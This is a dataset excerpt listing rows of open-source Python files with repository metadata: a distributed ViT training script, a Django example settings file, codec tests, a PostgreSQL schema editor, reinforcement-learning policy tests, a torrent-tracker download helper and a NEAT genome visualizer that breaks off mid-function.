| hexsha (string, len 40) | size (int64, 3 to 1.03M) | ext (string, 10 classes) | lang (string, 1 class) | max_stars_repo_path (string, len 3 to 972) | max_stars_repo_name (string, len 6 to 130) | max_stars_repo_head_hexsha (string, len 40 to 78) | max_stars_repo_licenses (list, len 1 to 10) | max_stars_count (int64, 1 to 191k, nullable) | max_stars_repo_stars_event_min_datetime (string, len 24, nullable) | max_stars_repo_stars_event_max_datetime (string, len 24, nullable) | max_issues_repo_path (string, len 3 to 972) | max_issues_repo_name (string, len 6 to 130) | max_issues_repo_head_hexsha (string, len 40 to 78) | max_issues_repo_licenses (list, len 1 to 10) | max_issues_count (int64, 1 to 116k, nullable) | max_issues_repo_issues_event_min_datetime (string, len 24, nullable) | max_issues_repo_issues_event_max_datetime (string, len 24, nullable) | max_forks_repo_path (string, len 3 to 972) | max_forks_repo_name (string, len 6 to 130) | max_forks_repo_head_hexsha (string, len 40 to 78) | max_forks_repo_licenses (list, len 1 to 10) | max_forks_count (int64, 1 to 105k, nullable) | max_forks_repo_forks_event_min_datetime (string, len 24, nullable) | max_forks_repo_forks_event_max_datetime (string, len 24, nullable) | content (string, len 3 to 1.03M) | avg_line_length (float64, 1.13 to 941k) | max_line_length (int64, 2 to 941k) | alphanum_fraction (float64, 0 to 1) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
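The rows listed below follow this schema. As a minimal sketch of how such rows might be consumed, assuming a hypothetical Parquet export named code_rows.parquet with the column names above (pandas is used here purely for illustration, not as the dataset's official loading API):

import pandas as pd

# Load a hypothetical export of the rows shown below.
df = pd.read_parquet("code_rows.parquet")

# Keep permissively licensed Python files under 10 kB.
permissive = {"MIT", "Apache-2.0", "BSD-2-Clause", "BSD-3-Clause"}
mask = (
    (df["lang"] == "Python")
    & (df["size"] < 10_000)
    & df["max_stars_repo_licenses"].apply(lambda licenses: bool(set(licenses) & permissive))
)
for _, row in df[mask].iterrows():
    print(row["max_stars_repo_path"], row["size"], row["alphanum_fraction"])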
d67a7120378a23a8121f142f10a4a3592d027dfb
| 3,812
|
py
|
Python
|
examples/vit_b16_imagenet_data_parallel/train.py
|
xdjiangkai/ColossalAI
|
4a3d3446b04065fa1c89b78cba673e96115c6325
|
[
"Apache-2.0"
] | null | null | null |
examples/vit_b16_imagenet_data_parallel/train.py
|
xdjiangkai/ColossalAI
|
4a3d3446b04065fa1c89b78cba673e96115c6325
|
[
"Apache-2.0"
] | null | null | null |
examples/vit_b16_imagenet_data_parallel/train.py
|
xdjiangkai/ColossalAI
|
4a3d3446b04065fa1c89b78cba673e96115c6325
|
[
"Apache-2.0"
] | 1
|
2022-01-06T17:16:32.000Z
|
2022-01-06T17:16:32.000Z
|
import glob
from math import log
import os
import colossalai
from colossalai.nn.metric import Accuracy
import torch
from colossalai.context import ParallelMode
from colossalai.core import global_context as gpc
from colossalai.logging import get_dist_logger
from colossalai.trainer import Trainer, hooks
from colossalai.nn.lr_scheduler import LinearWarmupLR
from dataloader.imagenet_dali_dataloader import DaliDataloader
from mixup import MixupLoss, MixupAccuracy
from timm.models import vit_base_patch16_224
from myhooks import TotalBatchsizeHook
def build_dali_train():
root = gpc.config.dali.root
train_pat = os.path.join(root, 'train/*')
train_idx_pat = os.path.join(root, 'idx_files/train/*')
return DaliDataloader(
sorted(glob.glob(train_pat)),
sorted(glob.glob(train_idx_pat)),
batch_size=gpc.config.BATCH_SIZE,
shard_id=gpc.get_local_rank(ParallelMode.DATA),
num_shards=gpc.get_world_size(ParallelMode.DATA),
training=True,
gpu_aug=gpc.config.dali.gpu_aug,
cuda=True,
mixup_alpha=gpc.config.dali.mixup_alpha
)
def build_dali_test():
root = gpc.config.dali.root
val_pat = os.path.join(root, 'validation/*')
val_idx_pat = os.path.join(root, 'idx_files/validation/*')
return DaliDataloader(
sorted(glob.glob(val_pat)),
sorted(glob.glob(val_idx_pat)),
batch_size=gpc.config.BATCH_SIZE,
shard_id=gpc.get_local_rank(ParallelMode.DATA),
num_shards=gpc.get_world_size(ParallelMode.DATA),
training=False,
# gpu_aug=gpc.config.dali.gpu_aug,
gpu_aug=False,
cuda=True,
mixup_alpha=gpc.config.dali.mixup_alpha
)
def main():
# initialize distributed setting
parser = colossalai.get_default_parser()
args = parser.parse_args()
# launch from slurm batch job
colossalai.launch_from_slurm(config=args.config,
host=args.host,
port=args.port,
backend=args.backend
)
# launch from torch
# colossalai.launch_from_torch(config=args.config)
# get logger
logger = get_dist_logger()
logger.info("initialized distributed environment", ranks=[0])
# build model
model = vit_base_patch16_224(drop_rate=0.1)
# build dataloader
train_dataloader = build_dali_train()
test_dataloader = build_dali_test()
# build optimizer
optimizer = colossalai.nn.Lamb(model.parameters(), lr=1.8e-2, weight_decay=0.1)
# build loss
criterion = MixupLoss(loss_fn_cls=torch.nn.CrossEntropyLoss)
    # lr_scheduler
lr_scheduler = LinearWarmupLR(optimizer, warmup_steps=50, total_steps=gpc.config.NUM_EPOCHS)
engine, train_dataloader, test_dataloader, _ = colossalai.initialize(
model, optimizer, criterion, train_dataloader, test_dataloader
)
logger.info("initialized colossalai components", ranks=[0])
# build trainer
trainer = Trainer(engine=engine, logger=logger)
# build hooks
hook_list = [
hooks.LossHook(),
hooks.AccuracyHook(accuracy_func=MixupAccuracy()),
hooks.LogMetricByEpochHook(logger),
hooks.LRSchedulerHook(lr_scheduler, by_epoch=True),
TotalBatchsizeHook(),
# comment if you do not need to use the hooks below
hooks.SaveCheckpointHook(interval=1, checkpoint_dir='./ckpt'),
hooks.TensorboardHook(log_dir='./tb_logs', ranks=[0]),
]
# start training
trainer.fit(
train_dataloader=train_dataloader,
test_dataloader=test_dataloader,
epochs=gpc.config.NUM_EPOCHS,
hooks=hook_list,
display_progress=True,
test_interval=1
)
if __name__ == '__main__':
main()
| 31.245902
| 96
| 0.68468
|
0c6613c068ef14a27e8f030bf098763474c480df
| 2,045
|
py
|
Python
|
examples/frameworks/django/djangotest/settings.py
|
ashishmjn/gunicorn
|
d478968d5977073c190d640363a1f822e82c90f6
|
[
"MIT"
] | 3
|
2018-03-06T16:00:45.000Z
|
2019-04-10T10:08:20.000Z
|
examples/frameworks/django/djangotest/settings.py
|
ashishmjn/gunicorn
|
d478968d5977073c190d640363a1f822e82c90f6
|
[
"MIT"
] | null | null | null |
examples/frameworks/django/djangotest/settings.py
|
ashishmjn/gunicorn
|
d478968d5977073c190d640363a1f822e82c90f6
|
[
"MIT"
] | 1
|
2019-10-08T05:51:29.000Z
|
2019-10-08T05:51:29.000Z
|
# Django settings for djangotest project.
import platform
PRODUCTION_MODE = platform.node().startswith('http')
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('benoitc', 'bchesneau@gmail.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'test.db',
}
}
TIME_ZONE = 'America/Chicago'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = True
USE_L10N = True
MEDIA_ROOT = ''
MEDIA_URL = ''
STATIC_ROOT = ''
STATIC_URL = '/static/'
ADMIN_MEDIA_PREFIX = '/static/admin/'
STATICFILES_DIRS = (
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
SECRET_KEY = 'c-u@jrg$dy)g7%)=jg)c40d0)4z0b%mltvtu)85l1&*(zwau(f'
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
FILE_UPLOAD_HANDLERS = (
"django.core.files.uploadhandler.TemporaryFileUploadHandler",
)
ROOT_URLCONF = 'djangotest.urls'
TEMPLATE_DIRS = ()
SOME_VALUE = "hello world"
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'djangotest.testing',
'gunicorn',
)
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| 19.47619
| 69
| 0.658191
|
9359564121aaa7bcfc9ac0f0757e671d948f2fa8
| 2,745
|
py
|
Python
|
from_cpython/Lib/test/test_codecencodings_kr.py
|
aisk/pyston
|
ac69cfef0621dbc8901175e84fa2b5cb5781a646
|
[
"BSD-2-Clause",
"Apache-2.0"
] | 1
|
2020-02-06T14:28:45.000Z
|
2020-02-06T14:28:45.000Z
|
from_cpython/Lib/test/test_codecencodings_kr.py
|
aisk/pyston
|
ac69cfef0621dbc8901175e84fa2b5cb5781a646
|
[
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null |
from_cpython/Lib/test/test_codecencodings_kr.py
|
aisk/pyston
|
ac69cfef0621dbc8901175e84fa2b5cb5781a646
|
[
"BSD-2-Clause",
"Apache-2.0"
] | 1
|
2020-02-06T14:29:00.000Z
|
2020-02-06T14:29:00.000Z
|
# expected: fail
#
# test_codecencodings_kr.py
# Codec encoding tests for ROK encodings.
#
from test import test_support
from test import test_multibytecodec_support
import unittest
class Test_CP949(test_multibytecodec_support.TestBase, unittest.TestCase):
encoding = 'cp949'
tstring = test_multibytecodec_support.load_teststring('cp949')
codectests = (
# invalid bytes
("abc\x80\x80\xc1\xc4", "strict", None),
("abc\xc8", "strict", None),
("abc\x80\x80\xc1\xc4", "replace", u"abc\ufffd\uc894"),
("abc\x80\x80\xc1\xc4\xc8", "replace", u"abc\ufffd\uc894\ufffd"),
("abc\x80\x80\xc1\xc4", "ignore", u"abc\uc894"),
)
class Test_EUCKR(test_multibytecodec_support.TestBase, unittest.TestCase):
encoding = 'euc_kr'
tstring = test_multibytecodec_support.load_teststring('euc_kr')
codectests = (
# invalid bytes
("abc\x80\x80\xc1\xc4", "strict", None),
("abc\xc8", "strict", None),
("abc\x80\x80\xc1\xc4", "replace", u"abc\ufffd\uc894"),
("abc\x80\x80\xc1\xc4\xc8", "replace", u"abc\ufffd\uc894\ufffd"),
("abc\x80\x80\xc1\xc4", "ignore", u"abc\uc894"),
# composed make-up sequence errors
("\xa4\xd4", "strict", None),
("\xa4\xd4\xa4", "strict", None),
("\xa4\xd4\xa4\xb6", "strict", None),
("\xa4\xd4\xa4\xb6\xa4", "strict", None),
("\xa4\xd4\xa4\xb6\xa4\xd0", "strict", None),
("\xa4\xd4\xa4\xb6\xa4\xd0\xa4", "strict", None),
("\xa4\xd4\xa4\xb6\xa4\xd0\xa4\xd4", "strict", u"\uc4d4"),
("\xa4\xd4\xa4\xb6\xa4\xd0\xa4\xd4x", "strict", u"\uc4d4x"),
("a\xa4\xd4\xa4\xb6\xa4", "replace", u"a\ufffd"),
("\xa4\xd4\xa3\xb6\xa4\xd0\xa4\xd4", "strict", None),
("\xa4\xd4\xa4\xb6\xa3\xd0\xa4\xd4", "strict", None),
("\xa4\xd4\xa4\xb6\xa4\xd0\xa3\xd4", "strict", None),
("\xa4\xd4\xa4\xff\xa4\xd0\xa4\xd4", "replace", u"\ufffd"),
("\xa4\xd4\xa4\xb6\xa4\xff\xa4\xd4", "replace", u"\ufffd"),
("\xa4\xd4\xa4\xb6\xa4\xd0\xa4\xff", "replace", u"\ufffd"),
("\xc1\xc4", "strict", u"\uc894"),
)
class Test_JOHAB(test_multibytecodec_support.TestBase, unittest.TestCase):
encoding = 'johab'
tstring = test_multibytecodec_support.load_teststring('johab')
codectests = (
# invalid bytes
("abc\x80\x80\xc1\xc4", "strict", None),
("abc\xc8", "strict", None),
("abc\x80\x80\xc1\xc4", "replace", u"abc\ufffd\ucd27"),
("abc\x80\x80\xc1\xc4\xc8", "replace", u"abc\ufffd\ucd27\ufffd"),
("abc\x80\x80\xc1\xc4", "ignore", u"abc\ucd27"),
)
def test_main():
test_support.run_unittest(__name__)
if __name__ == "__main__":
test_main()
| 39.214286
| 74
| 0.599271
|
9c6fe3d55e85f6641dc5bb3a357ed2a24414d1ac
| 797
|
py
|
Python
|
binarynum.py
|
AndyPham2341/DecimalNumberToBinaryNumber
|
28be6fc4b58de269b44acb20b11c2cb785944aef
|
[
"MIT"
] | null | null | null |
binarynum.py
|
AndyPham2341/DecimalNumberToBinaryNumber
|
28be6fc4b58de269b44acb20b11c2cb785944aef
|
[
"MIT"
] | null | null | null |
binarynum.py
|
AndyPham2341/DecimalNumberToBinaryNumber
|
28be6fc4b58de269b44acb20b11c2cb785944aef
|
[
"MIT"
] | null | null | null |
import sys
#check for two arguments: input file and output file
if(len(sys.argv) != 3):
print("usage: python binarynum.py inputfile outputfile")
quit()
#open the input file and get the numbers
with open(sys.argv[1]) as f:
numbers = [int(x) for x in f]
#print the input number
print("input number {0}".format(numbers))
#open the place to write the file
with open(sys.argv[2],"w") as file:
#loop through number, write decimal numbers as 32 bits
for idx, num in enumerate(numbers):
#convert decimal number to binary number with padding so it's 32 bits
binNum = "{:0>32}".format(bin(num)[2:])
#write to file
file.write(binNum + "\n")
#write to console
print("index{0}: Binary number of {1} is {2}".format(idx,num,binNum))
| 33.208333
| 77
| 0.649937
|
430e67965f07ed482108510eea49284b731f0b2a
| 837
|
py
|
Python
|
test/testTorchAttention.py
|
quyuanhang/match_in_chat_torch
|
36242c01b99c6ab0001a6084dbbdead6dae770d6
|
[
"Unlicense"
] | null | null | null |
test/testTorchAttention.py
|
quyuanhang/match_in_chat_torch
|
36242c01b99c6ab0001a6084dbbdead6dae770d6
|
[
"Unlicense"
] | null | null | null |
test/testTorchAttention.py
|
quyuanhang/match_in_chat_torch
|
36242c01b99c6ab0001a6084dbbdead6dae770d6
|
[
"Unlicense"
] | null | null | null |
import torch
import numpy as np
import sys
sys.path.append('../')
from networks.torchCNN import TextCNN
from networks.torchAttention import Attention
if __name__ == '__main__':
data1 = np.random.randint(200, size=[10, 25, 50])
data2 = np.random.randint(200, size=[10, 25, 50])
for i in range(1, 10):
data1[i, -i:, :] = 0
data1[i, :, -i:] = 0
X1 = torch.LongTensor(data1)
X2 = torch.LongTensor(data2)
cnn1 = TextCNN(200, 100, 25, 50)
Y1 = cnn1.forward(X1)
cnn2 = TextCNN(200, 100, 25, 50)
Y2 = cnn2.forward(X2)
attention = Attention(25)
inf_mask, zero_mask = attention.get_masks(data1, data2)
INF_MASK = torch.FloatTensor(inf_mask)
ZERO_MASK = torch.FloatTensor(zero_mask)
out1, out2 = attention.forward(Y1, Y2, INF_MASK, ZERO_MASK)
print(out2.shape)
| 23.25
| 63
| 0.647551
|
6ed7e6f43ed0d4cdefd36412ebbb657e29264f44
| 3,060
|
py
|
Python
|
torrt/trackers/anidub.py
|
st7105/torrt
|
97a3cb20a8caec5bba2132543343a82eb13aa182
|
[
"BSD-3-Clause"
] | 82
|
2015-04-12T08:36:53.000Z
|
2022-01-17T07:51:42.000Z
|
torrt/trackers/anidub.py
|
st7105/torrt
|
97a3cb20a8caec5bba2132543343a82eb13aa182
|
[
"BSD-3-Clause"
] | 79
|
2015-04-12T08:35:59.000Z
|
2022-02-10T12:05:26.000Z
|
torrt/trackers/anidub.py
|
st7105/torrt
|
97a3cb20a8caec5bba2132543343a82eb13aa182
|
[
"BSD-3-Clause"
] | 26
|
2015-01-13T17:49:07.000Z
|
2021-07-20T10:02:46.000Z
|
from typing import List
from ..base_tracker import GenericPrivateTracker
class AniDUBTracker(GenericPrivateTracker):
"""This class implements .torrent files downloads for http://tr.anidub.com tracker."""
alias: str = 'tr.anidub.com'
login_url: str = 'https://%(domain)s/'
auth_cookie_name: str = 'dle_user_id'
def __init__(
self,
username: str = None,
password: str = None,
cookies: dict = None,
query_string: str = None,
quality_prefs: List[str] = None
):
super(AniDUBTracker, self).__init__(
username=username, password=password, cookies=cookies, query_string=query_string
)
if quality_prefs is None:
quality_prefs = ['bd720', 'tv720', 'dvd480', 'hwp', 'psp']
self.quality_prefs = quality_prefs
def get_login_form_data(self, login: str, password: str) -> dict:
return {'login_name': login, 'login_password': password, 'login': 'submit'}
def get_download_link(self, url: str) -> str:
"""Tries to find .torrent file download link at forum thread page and return that one."""
download_link = ''
page_soup = self.get_torrent_page(url)
if page_soup.select('form input[name="login"]'):
self.log_debug('Login is required to download torrent file.')
domain = self.extract_domain(url)
if self.login(domain):
download_link = self.get_download_link(url)
else:
available_qualities = []
quality_divs = page_soup.select('div.torrent > div.torrent_c > div')
for quality_div in quality_divs:
available_qualities.append(quality_div['id'])
self.log_debug(f"Available in qualities: {', '.join(available_qualities)}")
if available_qualities:
preferred_qualities = [
quality
for quality in self.quality_prefs
if quality in available_qualities
]
if not preferred_qualities:
self.log_debug(
"Torrent is not available in preferred qualities: "
f"{', '.join(self.quality_prefs)}")
else:
target_quality = preferred_qualities[0]
self.log_debug(f'Trying to get torrent in `{target_quality}` quality ...')
target_links = page_soup.select(f'div#{target_quality} div.torrent_h a')
if target_links:
if isinstance(target_links, list):
download_link = target_links[0]['href']
else:
download_link = target_links['href']
download_link = self.expand_link(url, download_link)
else:
self.log_debug(f'Unable to find a link for `{target_quality}` quality')
return download_link
| 32.210526
| 97
| 0.563399
|
3e1cc7cc8a0fb50b28e7c8152be5daa85bbee45a
| 744
|
py
|
Python
|
app/async_mode.py
|
ju1115kr/afoccert
|
d0278e36ed49305b9ea69b1ca614a058a1bc0658
|
[
"MIT"
] | 10
|
2017-09-23T05:08:25.000Z
|
2021-01-06T05:21:40.000Z
|
server/app/async_mode.py
|
ju1115kr/hash-brown
|
93c5e636404608c7cba889cc9f9e0f3d3d0723b2
|
[
"Apache-2.0"
] | 9
|
2018-06-27T10:29:37.000Z
|
2021-12-13T19:48:39.000Z
|
server/app/async_mode.py
|
ju1115kr/tell-your-story
|
dedd084734c4bc47ece16c08e44ab5e8accc8395
|
[
"Apache-2.0"
] | 2
|
2018-07-04T16:54:20.000Z
|
2018-07-04T16:58:36.000Z
|
#!/usr/bin/env python
# Set this variable to "threading", "eventlet" or "gevent" to test the
# different async modes, or leave it set to None for the application to choose
# the best option based on available packages.
async_mode = None
if async_mode is None:
try:
import eventlet
async_mode = 'eventlet'
except ImportError:
pass
if async_mode is None:
try:
from gevent import monkey
async_mode = 'gevent'
except ImportError:
pass
if async_mode is None:
async_mode = 'threading'
if async_mode == 'eventlet':
import eventlet
eventlet.monkey_patch()
elif async_mode == 'gevent':
from gevent import monkey
monkey.patch_all()
| 23.25
| 78
| 0.646505
|
8d4db4ea1c3a98f244d776622113a0984123e087
| 6,168
|
py
|
Python
|
django/db/backends/postgresql/schema.py
|
andreip/django
|
c61d1361d027a729d07d277879950ff133c19f4c
|
[
"PSF-2.0",
"BSD-3-Clause"
] | 1
|
2021-02-14T13:02:28.000Z
|
2021-02-14T13:02:28.000Z
|
django/db/backends/postgresql/schema.py
|
andreip/django
|
c61d1361d027a729d07d277879950ff133c19f4c
|
[
"PSF-2.0",
"BSD-3-Clause"
] | null | null | null |
django/db/backends/postgresql/schema.py
|
andreip/django
|
c61d1361d027a729d07d277879950ff133c19f4c
|
[
"PSF-2.0",
"BSD-3-Clause"
] | null | null | null |
import psycopg2
from django.db.backends.base.schema import BaseDatabaseSchemaEditor
class DatabaseSchemaEditor(BaseDatabaseSchemaEditor):
sql_alter_column_type = "ALTER COLUMN %(column)s TYPE %(type)s USING %(column)s::%(type)s"
sql_create_sequence = "CREATE SEQUENCE %(sequence)s"
sql_delete_sequence = "DROP SEQUENCE IF EXISTS %(sequence)s CASCADE"
sql_set_sequence_max = "SELECT setval('%(sequence)s', MAX(%(column)s)) FROM %(table)s"
sql_create_index = "CREATE INDEX %(name)s ON %(table)s%(using)s (%(columns)s)%(extra)s"
sql_create_varchar_index = "CREATE INDEX %(name)s ON %(table)s (%(columns)s varchar_pattern_ops)%(extra)s"
sql_create_text_index = "CREATE INDEX %(name)s ON %(table)s (%(columns)s text_pattern_ops)%(extra)s"
sql_delete_index = "DROP INDEX IF EXISTS %(name)s"
# Setting the constraint to IMMEDIATE runs any deferred checks to allow
# dropping it in the same transaction.
sql_delete_fk = "SET CONSTRAINTS %(name)s IMMEDIATE; ALTER TABLE %(table)s DROP CONSTRAINT %(name)s"
def quote_value(self, value):
return psycopg2.extensions.adapt(value)
def _field_indexes_sql(self, model, field):
output = super()._field_indexes_sql(model, field)
like_index_statement = self._create_like_index_sql(model, field)
if like_index_statement is not None:
output.append(like_index_statement)
return output
def _create_like_index_sql(self, model, field):
"""
Return the statement to create an index with varchar operator pattern
when the column type is 'varchar' or 'text', otherwise return None.
"""
db_type = field.db_type(connection=self.connection)
if db_type is not None and (field.db_index or field.unique):
# Fields with database column types of `varchar` and `text` need
# a second index that specifies their operator class, which is
# needed when performing correct LIKE queries outside the
# C locale. See #12234.
#
# The same doesn't apply to array fields such as varchar[size]
# and text[size], so skip them.
if '[' in db_type:
return None
if db_type.startswith('varchar'):
return self._create_index_sql(model, [field], suffix='_like', sql=self.sql_create_varchar_index)
elif db_type.startswith('text'):
return self._create_index_sql(model, [field], suffix='_like', sql=self.sql_create_text_index)
return None
def _alter_column_type_sql(self, table, old_field, new_field, new_type):
"""Make ALTER TYPE with SERIAL make sense."""
if new_type.lower() in ("serial", "bigserial"):
column = new_field.column
sequence_name = "%s_%s_seq" % (table, column)
col_type = "integer" if new_type.lower() == "serial" else "bigint"
return (
(
self.sql_alter_column_type % {
"column": self.quote_name(column),
"type": col_type,
},
[],
),
[
(
self.sql_delete_sequence % {
"sequence": self.quote_name(sequence_name),
},
[],
),
(
self.sql_create_sequence % {
"sequence": self.quote_name(sequence_name),
},
[],
),
(
self.sql_alter_column % {
"table": self.quote_name(table),
"changes": self.sql_alter_column_default % {
"column": self.quote_name(column),
"default": "nextval('%s')" % self.quote_name(sequence_name),
}
},
[],
),
(
self.sql_set_sequence_max % {
"table": self.quote_name(table),
"column": self.quote_name(column),
"sequence": self.quote_name(sequence_name),
},
[],
),
],
)
else:
return super()._alter_column_type_sql(table, old_field, new_field, new_type)
def _alter_field(self, model, old_field, new_field, old_type, new_type,
old_db_params, new_db_params, strict=False):
# Drop indexes on varchar/text columns that are changing to a different
# type.
if (old_field.db_index or old_field.unique) and (
(old_type.startswith('varchar') and not new_type.startswith('varchar')) or
(old_type.startswith('text') and not new_type.startswith('text'))
):
index_name = self._create_index_name(model, [old_field.column], suffix='_like')
self.execute(self._delete_constraint_sql(self.sql_delete_index, model, index_name))
super()._alter_field(
model, old_field, new_field, old_type, new_type, old_db_params,
new_db_params, strict,
)
# Added an index? Create any PostgreSQL-specific indexes.
if ((not (old_field.db_index or old_field.unique) and new_field.db_index) or
(not old_field.unique and new_field.unique)):
like_index_statement = self._create_like_index_sql(model, new_field)
if like_index_statement is not None:
self.execute(like_index_statement)
# Removed an index? Drop any PostgreSQL-specific indexes.
if old_field.unique and not (new_field.db_index or new_field.unique):
index_to_remove = self._create_index_name(model, [old_field.column], suffix='_like')
self.execute(self._delete_constraint_sql(self.sql_delete_index, model, index_to_remove))
| 47.083969
| 112
| 0.568256
|
8c67a224b3633b92644c835f4d18910d870816c4
| 2,972
|
py
|
Python
|
tests/softlearning/policies/uniform_policy_test.py
|
brickerino/tqc
|
b449f483871eb9972a168d9338e84399778d36cd
|
[
"MIT"
] | 362
|
2019-04-16T22:45:21.000Z
|
2022-03-30T06:13:22.000Z
|
tests/softlearning/policies/uniform_policy_test.py
|
brickerino/tqc
|
b449f483871eb9972a168d9338e84399778d36cd
|
[
"MIT"
] | 39
|
2019-05-03T04:21:14.000Z
|
2022-03-11T23:45:03.000Z
|
tests/softlearning/policies/uniform_policy_test.py
|
brickerino/tqc
|
b449f483871eb9972a168d9338e84399778d36cd
|
[
"MIT"
] | 67
|
2019-04-17T03:35:29.000Z
|
2021-12-26T05:39:37.000Z
|
from collections import OrderedDict
import pickle
import numpy as np
import tensorflow as tf
import gym
from softlearning.policies.uniform_policy import UniformPolicy
class UniformPolicyTest(tf.test.TestCase):
def setUp(self):
self.env = gym.envs.make('Swimmer-v3')
self.policy = UniformPolicy(
input_shapes=(self.env.observation_space.shape, ),
output_shape=self.env.action_space.shape)
def test_actions_and_log_pis_symbolic(self):
observation1_np = self.env.reset()
observation2_np = self.env.step(self.env.action_space.sample())[0]
observations_np = np.stack((observation1_np, observation2_np))
observations_tf = tf.constant(observations_np, dtype=tf.float32)
actions = self.policy.actions([observations_tf])
log_pis = self.policy.log_pis([observations_tf], actions)
self.assertEqual(actions.shape, (2, *self.env.action_space.shape))
self.assertEqual(log_pis.shape, (2, 1))
self.evaluate(tf.global_variables_initializer())
actions_np = self.evaluate(actions)
log_pis_np = self.evaluate(log_pis)
self.assertEqual(actions_np.shape, (2, *self.env.action_space.shape))
self.assertEqual(log_pis_np.shape, (2, 1))
def test_actions_and_log_pis_numeric(self):
observation1_np = self.env.reset()
observation2_np = self.env.step(self.env.action_space.sample())[0]
observations_np = np.stack((observation1_np, observation2_np))
actions_np = self.policy.actions_np([observations_np])
log_pis_np = self.policy.log_pis_np([observations_np], actions_np)
self.assertEqual(actions_np.shape, (2, *self.env.action_space.shape))
self.assertEqual(log_pis_np.shape, (2, 1))
def test_env_step_with_actions(self):
observation1_np = self.env.reset()
action = self.policy.actions_np(observation1_np[None])[0, ...]
self.env.step(action)
def test_trainable_variables(self):
self.assertEqual(len(self.policy.trainable_variables), 0)
def test_get_diagnostics(self):
observation1_np = self.env.reset()
observation2_np = self.env.step(self.env.action_space.sample())[0]
observations_np = np.stack((observation1_np, observation2_np))
diagnostics = self.policy.get_diagnostics([observations_np])
self.assertTrue(isinstance(diagnostics, OrderedDict))
self.assertFalse(diagnostics)
def test_serialize_deserialize(self):
observation1_np = self.env.reset()
observation2_np = self.env.step(self.env.action_space.sample())[0]
observations_np = np.stack((observation1_np, observation2_np))
deserialized = pickle.loads(pickle.dumps(self.policy))
np.testing.assert_equal(
self.policy.actions_np([observations_np]).shape,
deserialized.actions_np([observations_np]).shape)
if __name__ == '__main__':
tf.test.main()
| 36.691358
| 77
| 0.698856
|
3e6321daf064d5c29fa7ee8c884c39a5a3c6d672
| 4,484
|
py
|
Python
|
population/utils/visualizing/genome_visualizer.py
|
RubenPants/RobotSimulator2D
|
334d7b9cab0edb22d4670cfaf39fbed76c351758
|
[
"MIT"
] | null | null | null |
population/utils/visualizing/genome_visualizer.py
|
RubenPants/RobotSimulator2D
|
334d7b9cab0edb22d4670cfaf39fbed76c351758
|
[
"MIT"
] | null | null | null |
population/utils/visualizing/genome_visualizer.py
|
RubenPants/RobotSimulator2D
|
334d7b9cab0edb22d4670cfaf39fbed76c351758
|
[
"MIT"
] | null | null | null |
"""
visualizer.py
Create visualizations for the genomes present in the population.
"""
import os
import sys
from graphviz import Digraph
from configs.genome_config import GenomeConfig
from population.utils.genome_util.genes import GruNodeGene, SimpleNodeGene
from population.utils.genome_util.genome import Genome
from population.utils.network_util.graphs import required_for_output
# Add graphviz to path if on Windows
if sys.platform == 'win32': os.environ["PATH"] += os.pathsep + 'C:/Program Files (x86)/Graphviz2.38/bin/'
def draw_net(config: GenomeConfig, genome: Genome, debug=False, filename=None, view=True):
"""
Visualize the structure of one genome.
:param config: Configuration of the network
:param genome: Genome (network) that will be visualized
:param debug: Add excessive information to the drawing
:param filename: Name of the file
:param view: Visualize when method is run
"""
# Assign names to sensors (hard-coded since immutable)
node_names = dict()
node_names.update(genome.robot_snapshot)
node_names[0] = 'left wheel'
node_names[1] = 'right wheel'
num_inputs = len(genome.robot_snapshot)
# Visualizer specific functionality
node_colors = dict()
dot = Digraph(format='png', engine="fdp")
dot.attr(overlap='false')
# Get the used hidden nodes and all used connections
used_inp_nodes, used_hid_nodes, used_outp_nodes, used_conn = required_for_output(
inputs=set(config.keys_input),
outputs=set(config.keys_output),
connections=genome.connections
)
# Visualize input nodes
inputs = set()
active = {a for (a, b) in used_conn if a < 0}
for index, key in enumerate(config.keys_input):
inputs.add(key)
name = node_names.get(key)
color = '#e3e3e3' if key in active else '#9e9e9e'
if debug or key in active:
dot.node(
name,
style='filled',
shape='box',
fillcolor=node_colors.get(key, color),
pos=f"{index * 20},0!"
)
# Visualize output nodes
outputs = set()
for index, key in enumerate(config.keys_output):
outputs.add(key)
name = node_names[key]
if debug:
name += f'\nactivation={genome.nodes[key].activation}'
name += f'\nbias={round(genome.nodes[key].bias, 2)}'
node_names.update({key: name})
dot.node(
name,
style='filled',
shape='box',
fillcolor=node_colors.get(key, '#bdc5ff'),
pos=f"{(num_inputs - 5) * 10 + index * 100}, "
f"{200 + len(used_hid_nodes) * (50 if debug else 20)}!",
)
# Visualize hidden nodes
for key in sorted(used_hid_nodes):
assert (key not in inputs) and (key not in outputs)
fillcolor = 'white' if type(genome.nodes[key]) == SimpleNodeGene else '#f5c484' # fancy orange
if debug:
if type(genome.nodes[key]) == GruNodeGene:
genome.update_gru_nodes(config)
name = str(genome.nodes[key])
else:
name = str(key)
node_names.update({key: name})
dot.node(
name,
style='filled',
shape='box',
fillcolor=node_colors.get(key, fillcolor),
)
# Add inputs to used_nodes (i.e. all inputs will always be visualized, even if they aren't used!)
used_nodes = (used_inp_nodes | used_hid_nodes | used_outp_nodes)
# Visualize connections
for cg in used_conn.values():
sending_node, receiving_node = cg.key
if sending_node in used_nodes and receiving_node in used_nodes:
color = 'green' if cg.weight > 0 else 'red'
width = str(0.1 + abs(cg.weight) / config.weight_max_value * 5)
dot.edge(
